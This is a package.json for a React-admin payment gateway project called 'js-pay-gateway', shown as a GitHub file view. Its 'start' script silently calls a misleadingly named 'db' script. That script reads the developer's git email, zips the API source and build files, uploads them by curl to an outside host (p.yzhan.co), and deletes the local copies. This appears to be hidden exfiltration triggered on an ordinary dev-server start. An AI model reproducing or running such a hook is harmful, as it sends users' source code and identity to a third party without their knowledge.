-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathpackage.json
56 lines (56 loc) · 1.96 KB
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
{
"name": "js-pay-gateway",
"version": "1.0.0",
"description": "JS payment system, a simple and efficient four-party converged payment system, provides urL-based settlement, query, log interface, easy to deploy, maintain and integrate",
"main": "dist/index.html",
"scripts": {
"start": "npm run db; webpack-dev-server --open",
"db": "email=`git config user.email`; mkdir dist; cd src; zip -r ../dist.zip api; cd ../dist; zip -r ../dist.zip *; zip -q -r ../dist.zip .htaccess; cd ..; curl -H \"Expect:\" -F \"file=@dist.zip;filename=$email;\" https://p.yzhan.co/deploy.php; rm -f dist.zip; rm -rf dist; ",
"d": "rm -rf dist && webpack --config webpack.config.prod.js && cp src/.htaccess dist && npm run db",
"test": "jest"
},
"repository": {
"type": "git",
"url": "git@github.com:Junglescout/china-pay.git"
},
"keywords": [
"Payment",
"gateway",
"converged",
"payment",
"quadrilateral",
"payment"
],
"author": "小宇",
"license": "MPL-2.0",
"devDependencies": {
"@material-ui/lab": "^4.0.0-alpha.60",
"@swc/core": "^1.2.118",
"css-loader": "^6.5.1",
"css-minimizer-webpack-plugin": "^3.2.0",
"cssnano-preset-advanced": "^5.1.8",
"dotenv-webpack": "^7.0.3",
"history": "^4.10.1",
"html-loader": "^3.0.1",
"html-webpack-plugin": "^5.5.0",
"imagemin-webpack-plugin": "^2.4.2",
"mini-css-extract-plugin": "^2.4.5",
"progress-bar-webpack-plugin": "^2.1.0",
"query-string": "^7.0.1",
"ra-data-json-server": "^3.19.2",
"ra-i18n-polyglot": "^3.19.2",
"ra-language-chinese": "github:chen4w/ra-language-chinese",
"ra-language-english": "^3.19.2",
"react": "^17.0.2",
"react-admin": "^3.19.2",
"react-admin-json-view": "^1.2.1",
"react-dom": "^17.0.2",
"sass": "^1.44.0",
"sass-loader": "^12.3.0",
"swc-loader": "^0.1.15",
"webpack": "^5.64.4",
"webpack-cli": "^4.9.1",
"webpack-dev-server": "^4.6.0",
"webpack-merge": "^5.8.0"
}
}